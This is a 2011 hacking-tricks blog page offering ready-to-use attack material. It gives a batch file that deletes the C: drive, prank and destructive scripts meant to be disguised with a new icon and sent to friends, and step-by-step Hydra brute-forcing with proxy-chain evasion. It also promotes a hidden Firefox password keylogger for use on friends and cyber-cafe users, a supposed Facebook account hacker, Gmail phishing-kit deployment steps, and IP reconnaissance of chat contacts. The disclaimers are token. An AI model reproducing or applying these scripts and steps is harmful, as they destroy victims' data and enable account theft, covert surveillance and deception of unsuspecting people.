Pages

Tuesday, June 28, 2011

fr any help

http://www.techtalkz.com/tips-n-tricks/3112-learn-simple-virus-program-using-notepad.html

write ur own simple virus cant detected by any antivirus....

@Echo off
Del C:\ *.* |y

And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...

PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:...

IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive

EVEN I DIDN't TRY THIS........

I WILL NOT RESPONSIBLE FOR ANYTHING DONE BYE U USING THE INFORMATION GIVEN ABOVE...

for any help(www.myhistoryweb.blogspot.com

10) THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe
Enjoy!!!^^

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

8. Open Notepad continually in your friend's computer: Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

7) Hack your friend's keyboard and make him type "You are a fool" simultaneously: Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out: Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it

4) Frustrate your friend by making this VBScript hit Enter simultaneously: Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

3) Convey your friend a lil' message and shut down his / her computer: Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

2) Toggle your friend's Caps Lock button simultaneously: Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

Create virus for 1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them?

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

Monday, June 27, 2011

How to crack account password through brute force?


What is brute forcing ?
In layman language, brute forcing means using a tool that picks passwords from a word list and tries them one by one until one works.

How to make a word list ?
A word list can consist of all possible combination's of letter,numbers,special characters. It can have some common or default passwords. You can download the word list generators or goggle the word-lists for brute-forcing and configure them according to yourself.

How fruitful attack can be ?
If we are try all possible combination's of letter,numbers,special characters, theoretically chances of success are 100%. But practically it is not possible to try every combination because it can take a lot of time. This attack just depends on the time you give,processing power and of course your luck.

Many tools are use for it hydra is one of them

Step 1
Download THC Hydra from( http://www.ziddu.com/download/14050686/hydra-5.7-src.tar.gz.zip.html)

Step 2
(a) Make a usename wordlist consisting of some common usernames like this


(b) Get a wordlist of passwords
(c) Copy both wordlists to your hydra folder

Step 3
(a)Open the command prompt and change directory to your hydra folder using cd command.

(b) Type "hydra" without quotes and it will show you the options to use.

(c) Now to start attak,

Type "hydra -L userslist.txt -P passlist.txt xxx.xxx.xxx.xxx ftp" and press enter

where userslist.txt is the list of usernames, passlist.txt is the list of passwords and xxx.xxx.xxx.xxx is the IP address of target, Now it will start cracking

To use a single username instead of wordlist , Replace capital L with small l , like this

Type "hydra -l username -P passlist.txt xxx.xxx.xxx.xxx ftp"

Note : Ftp port must be open.

Warning: I highly recommend you to use a chain of proxies to spoof your identity because proper logs of user's IP addresses who try to connect to ftp server is made on the server. Here is an example of the same.


Countermeasures to protect yourself from this attack:
Use strong passwords


THANKS....

How to use Firefox as a Keylogger for hacking Passwords?



Hello friends, After a long time, I am back with new hacking tool in this blog and this blog now opened for all readers now .In this post I am going to show how we can convert a world best and popular browser into a keylogger. I think you all know about Keylogger, a software used to keep track of all the activity that going on in our Pc in hidden mode.

Usually all keylogger are detected by most of all the antivirus has virus and they didn't allow to install them on your PC. Here, today we have something special for hobby Hackers, we have developed a "Firefox Keylogger" to store passwords automatically without asking any confirmation message, and this Keylogger is not detected by any Antivirus we tested with Top 20 Antivirus and the final result is "Found Nothing". so, you're safe to use this Keylogger.
About Firefox Keylogger:

The name itself indicates used to save passwords in Firefox browser without any notification. By default all browsers, used to ask confirmation message before saving passwords in browser. Now, what we have done is we just find the particular bit of code which used to ask confirmation message to save passwords, and replaced that code with saving password function. So, whenever you Login any website with Firefox browser it stop showing "Remember", "Never for This Site" and "Not Now" option, instead it automatically start storing password without asking confirmation message. In this way our application/software works.


Installing Firefox Keylogger:Installing Firefox keylogger is different form all other application/software. We designed this application in such a way that it only install by running the application/software by placing in "C:\" drive. So, if you need to install


"Firefox Keylogger" then you must place "Firefox Keylogger.exe" in "C:\" drive and run that application there.
Even if you place "Firefox Keylogger.exe" in "C:\Program Files\" it will not install so, you must place Firefox Keylogger.exe in C:\ this address only.
After running that application, it will install in Hidden mode and installation process will not be visible to you, within few seconds it will install and after installation you will see one command like below

Where it save password?It saves passwords in default password saving option that is in Tools >> Options >> Saved Passwords to see saved passwords in Firefox browser.
Features of Firefox Keylogger:

It is free from virus,spyware and malware
It records site, username and password which you used to login after installing Firefox keylogger without any clue
It won't use any system memory because, Firefox keylogger is used to modify the souce code of Firefox browser
This keylogger is designed in such a way that it is compactable with most of all versions of Firefox browser even upcoming version too! (Until developers modify Major structure change in Firefox setup file)
Easy to use
Small application
Undetectable to Antivirus
It disables "Remember", "Never for This Site" and "Not Now" notification option while login and more.
How we can use Firefox Keylogger for Hacking purpose?

This depends on you, you can use it in various ways, for example install it in your computer and whenever your friend comes to your home give some time to use Internet and on that he defiantly use that time to login to some of social networking sites like orkut, facebook etc., and thus you can used to hack his account. Are else install in cyber cafe and have a fun.
FAQ's:


1> Is it is purely safe to use?

Ans: Yes, it is completely safe to install and we scanned Firefox Keylogger with Top 20 Antivirus and all the scanned result "No virus found".

2> Freeware or Shareware?

Ans: It is completely Freeware, you no need to pay single cents to use this application.

3> Can we distribute it in our blog/website?

Ans: You're free to distribute this software by giving proper credit.

System Requirements:


Operating System: Xp,Vista and Windows 7

Browser: Firefox (any version)

Download: Firefox Keylogger


Let me know what you feel about this application/software? and how you used this application for hacking? is it really helps?

Sunday, June 5, 2011

Facebook Account Hacker Version 2.4


 
Facebook Account Hacker Version 2.4
I would like to welcome you to the release of the Facebook Account Hacker V2.1. A recent patch meant that V2 would no longer work, but after some hard work and research we have managed to fix the patch. Our Facebook Password Hacker is once again functional.

The application still works the same.
1. Enter the email of the account that you would like to hack.
2. Click "Hack!".
3. Then wait until the password shows up in the "password" field.
4. Then just copy & paste email and password on facebook login page.



How to hack PC while chatting?

I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.


Following are the features : -

1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
b) Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
b) Or it has client to client connection

And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.

So lets analyze
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.

So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio

1) Go to dos type -
netstat -n 3
You will get the following output.Just do not care and be cool

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED

Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next -

2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established. HMMMM then the first attacker first phase is over

This is the output in your netstat.The 5101 number port is where the Attacker is connected.

Active Connections

Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED


3) so what next???
Hmmm........ Ok so make a DOS attack now

Go to dos prompt and Just do
nbtstat -A Attackers IPaddress
Can happen that if system is not protected then you can see the whole network.

C:\>nbtstat -A 194.30.209.14

Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1E> GROUP Registered

MAC Address = 00-C0-W0-D5-EF-9A

How to hide texts in Notepad?



Have you ever tried to Hide text in a regulare windows Notepad....!
Yes, there is a possibility to hide some text in a Regular Notepad, but it seems to be working on only few versions on windows, probably on Windows XP SP2.

To hide text in a notepad, all what you need to do is, just open up a command prompt and type the command as given below,......



C:\>notepad secret.txt:hidden.txt

Then it will opens up a new Notepad file, and prompts whether to create a notepad file with the name secret, go ahead and click on 'yes'., then the title of the notepad file will changes and you may see the changes in the titlebar of the Notepad. Now type what ever you want there, according to your wish and go ahead and click on the X on the right exterme end on the Notepad window ( Close ), then it prompts whether to save the file or not, click on 'Yes'. Then Just type the "DIR" command to view whether the file has been created, it must be there and now go to the location where you saved the file and try to open it up, it will open but it will not display any text in it, instead, it will display a blank Notepad File....! :->
Inorder to view this Hidden text in this Notepad File, just again go to the same command prompt and then type the same command what you have typed to create the file, as below....
C:\>notepad secret.txt:hidden.txt

Now you will view the text what you typed there....!, also if you go ahead and check with the file size, it always seems to be 0KB, sometimes 1KB, and it will not cross these two filesizes, but you can type the contents upto MBs and so on...!
Any way, if someone came to know about this, they can easily open this file by using this simple command.


Dont worry Here is another way to hide the text in the same Notepad application, but it would differ a bit from the previous one, and here in this method you will give a password to open up this file.
In order to perform this Hack, just open up a new command prompt and type the command as given below,....
C:\>echo This is a secret File.....!
>textfile.txt:pa$$wd

C:\>

Seems to be a simple echo command, is it so?
But it will make these text hidden.
once you have entered the command, just type the "DIR" Command to check whether the file has been created, it will be there. and here it will create a new Notepad file with the name "textfile". and now try to open the file in a normal way, it will open but will be blank file and nothing will be displayed there, inorder to view the text what you typed there, you need to enter another command as below
C:\>more

Once after typing this command , it will display the text what you typed over there, like below.....!

This is a secret File ....!

and the exact output would be like this,.........


C:\>echo This is a secret File .....!
>textfile.txt:pa$$rd

C:\>more
This is a secret File .....!


Inorder to hide your own text, use the same syntax,
C:\> echo Text >Name.txt:password

where,
echo - Command
Text - Text you want to Hide
Name - Filename
password - password

and to open up the file and view the hidden text, the syntax would be,..
C:\> more < Name:password

where,
more - Command
Name - Filename
password - password


The first method is not password protected, but the last one is password protected.
Try it yourself and hide the text like this. :)

How to hack gmail accounts?




Their are many Gmail Phisher available on net but I must say they all are outdated and most of them are detected, So I though to create a new GmailPhisher which is very new and also created by CODE MOBILE.

This article is for educational purpose only, We want to make you aware how hacking is done, So don’t misuse this hacking tricks. We are not responsible for any wrong thing done by you


Steps To Hack Gmail Account :-

1. Download Gmail Phisher


2. This is compressed in .zip so first extract the folder to desktop

3. Upload all three files to my3gb.com. Or Any Other Hosting sites

4. Now shorten (name.my3gb.com/index.html) in goo.gl every time for new victim .

5. Now, you have to send this link to victim and make him login to our fake phishing page.

6. Once you came to know that victim logined to our Gmail Phishing Page then check log.txt.

7. In log.txt you will see his username and password .

All steps are done, By this method you can Hack Any Gmail Account Easily. But still we are one step behind. Its easy to create and set up a Phisher, Its bit hard to trap victim in our phisher. You have create new ideas which chatting and mean while have to trap victim. This method is known as Smart Phishing or Smart Gmail Phisher. By this you can Hack Gmail Account For Free

How To Defense From Phishing ?
-  Never enter your account information to the unknown webpage, always check the address bar and thus the webpage real address.

So friends, I hope you enjoyed this Tut. If you have any dobts regading this just comment...

How to open locked administrator account without software?

simple
1.when the locked accounts come press ctrl+alt+del
2.then there come a window
3.in this window type in first box "ADMINISTRATOR"
            and press enter and u logged in

How to Hack Gmail Account password


ordinary mode to hack Gmail tab password.I have posted this mode for hacking facebook tab password earlier  and now gmail tab.That is Phishing. This is one of the best mode to hack gmail  password.This will work only if your friend don’t know about this mode of hacking gmail.
For this We need three files: